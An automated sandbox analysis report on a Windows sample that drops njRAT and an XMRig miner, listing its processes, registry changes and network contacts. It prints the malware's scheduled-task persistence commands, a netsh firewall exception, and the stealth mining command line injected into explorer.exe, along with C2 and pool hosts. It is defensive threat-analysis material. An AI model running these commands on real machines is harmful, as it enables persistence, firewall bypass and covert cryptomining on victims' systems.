Malware Analysis Report

2025-03-15 06:26

Sample ID: 240122-nch7vsehfm
Target: 6f8798f01a7ec11429f624dbc59b4a32
SHA256: 580e02ff0dba47c835a4abff35ca5ecfe8e04e08206739936556b696141ed844
Tags: njrat xmrig hacked evasion miner persistence trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: 580e02ff0dba47c835a4abff35ca5ecfe8e04e08206739936556b696141ed844

Threat Level: Known bad

The file 6f8798f01a7ec11429f624dbc59b4a32 was found to be: Known bad.

Malicious Activity Summary

njrat xmrig hacked evasion miner persistence trojan

njRAT/Bladabindi

xmrig

XMRig Miner payload

Modifies Windows Firewall

Drops startup file

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Modifies system certificate store

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-01-22 11:15

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-01-22 11:15

Reported: 2024-01-22 11:17

Platform: win7-20231215-en

Max time kernel: 150s

Max time network: 151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"

Signatures

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2240 set thread context of 2276 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [binary blob omitted] C:\Users\Admin\AppData\Local\Temp\services32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1044 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 1044 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 1044 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 1044 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\lear.exe
PID 1044 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 1044 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 1044 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 1044 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe C:\Users\Admin\AppData\Local\Temp\svhost.exe
PID 2656 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 2656 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 2656 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 2656 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe
PID 2784 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Windows\System32\cmd.exe
PID 2784 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Windows\System32\cmd.exe
PID 2784 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Windows\System32\cmd.exe
PID 2556 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2556 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2556 wrote to memory of 2960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2784 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Users\Admin\AppData\Local\Temp\services32.exe
PID 2784 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Users\Admin\AppData\Local\Temp\services32.exe
PID 2784 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe C:\Users\Admin\AppData\Local\Temp\services32.exe
PID 2656 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 2656 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 2656 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 2656 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\lear.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe
PID 2572 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Windows\System32\cmd.exe
PID 2572 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Windows\System32\cmd.exe
PID 2572 wrote to memory of 1016 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Windows\System32\cmd.exe
PID 1016 wrote to memory of 2724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1016 wrote to memory of 2724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1016 wrote to memory of 2724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2572 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
PID 2572 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
PID 2572 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\services32.exe C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
PID 1660 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Windows\System32\cmd.exe
PID 1660 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Windows\System32\cmd.exe
PID 1660 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Windows\System32\cmd.exe
PID 944 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 944 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 944 wrote to memory of 876 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2816 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 2816 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 2816 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 2816 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\svhost.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1660 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 1660 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 1660 wrote to memory of 2240 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe C:\Users\Admin\AppData\Local\Temp\services64.exe
PID 2240 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 2240 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 2240 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\System32\cmd.exe
PID 2288 wrote to memory of 2292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2288 wrote to memory of 2292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2288 wrote to memory of 2292 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2240 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 2240 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 2240 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 1324 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 1324 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 1324 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 1324 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 2240 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2240 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2240 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe
PID 2240 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe

"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"

C:\Users\Admin\AppData\Local\Temp\lear.exe

"C:\Users\Admin\AppData\Local\Temp\lear.exe"

C:\Users\Admin\AppData\Local\Temp\svhost.exe

"C:\Users\Admin\AppData\Local\Temp\svhost.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'

C:\Users\Admin\AppData\Local\Temp\services32.exe

"C:\Users\Admin\AppData\Local\Temp\services32.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Users\Admin\AppData\Local\Temp\services64.exe

"C:\Users\Admin\AppData\Local\Temp\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=vlas --pass=a=randomx --cpu-max-threads-hint=40 --cinit-idle-wait=1 --cinit-idle-cpu=80 --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
DE 140.82.121.4:443 github.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 bishkek931.ddns.net udp
US 8.8.8.8:53 prohashing.com udp
US 104.21.10.32:3359 prohashing.com tcp
US 104.21.10.32:3359 prohashing.com tcp
US 104.21.10.32:3359 prohashing.com tcp
US 172.67.189.225:3359 prohashing.com tcp
US 104.21.10.32:3359 prohashing.com tcp
US 172.67.189.225:3359 prohashing.com tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-01-22 11:15

Reported

2024-01-22 11:17

Platform

win10v2004-20231222-en

Max time kernel

149s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe"

Signatures

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\lear.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svhost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9aae056fac505440e6c8356ee4efc63f.exe C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\9aae056fac505440e6c8356ee4efc63f = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2424 set thread context of 4072 N/A C:\Users\Admin\AppData\Local\Temp\services64.exe C:\Windows\explorer.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6f8798f01a7ec11429f624dbc59b4a32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\1_protected.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\services32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\2_protected.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
